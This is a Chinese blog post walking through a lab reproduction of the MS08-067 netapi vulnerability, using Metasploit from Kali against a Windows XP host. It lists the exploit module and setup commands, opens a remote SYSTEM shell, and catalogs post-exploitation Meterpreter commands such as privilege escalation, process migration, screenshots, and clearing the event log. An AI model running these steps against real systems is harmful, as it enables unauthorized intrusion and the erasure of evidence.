MS08_067_netapi漏洞复现

 MS08_067_netapi漏洞复现

在这里插入图片描述
winxp的ip地址为192.168.0.101

kali的ip地址为192.168.0.105
确保两台主机能ping通

在这里插入图片描述

接着我们使用kali中自带的msf进行攻击
开启postgresql数据库

service postgresql start 

启动msf

msfconsole

在这里插入图片描述

我们利用msf的数据库搜索相应winxp的漏洞

search netapi

在这里插入图片描述

use exploit/windows/smb/ms08_067_netapi

在这里插入图片描述

show targets //查看使用平台
show options //查看要设置哪些参数
show payloads //查看可以使用哪些攻击载荷
check            //设置完RHOST后检查其是否脆弱
exploit         //开始攻击

在这里插入图片描述

RHOST为被攻击者的ip地址
LHOST为攻击者的ip地址

在这里插入图片描述
设置攻击载荷

在这里插入图片描述
开始攻击!
在这里插入图片描述
这就攻击成功了,可以看出还是很好利用的,没有过多的尝试,接下来可以做什么呢

shell   //获取对方的cmd窗口

在这里插入图片描述
可以看到已经进入,并且在system32目录下,中间有部分乱码,不用管

恶搞一下

在这里插入图片描述
这样就在对方C盘下建了一个hahaha文件夹

在这里插入图片描述

存在,说明成功!

除此之外还可以有很多操作

reboot //重启受害人计算机
shutdown //关闭
sysinfo  //查看目标系统信息
run vnc  //开启远程桌面
clearev  //清除计算机日志
screenshot   //屏幕截图
getSystem     //获取对方system权限
migrate    //移动到另一个PID
getuid     //获取当前权限的用户id
background 将Meterpreter放入后台(使用sessions -i重新连接到会话)

读者可以自行尝试

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值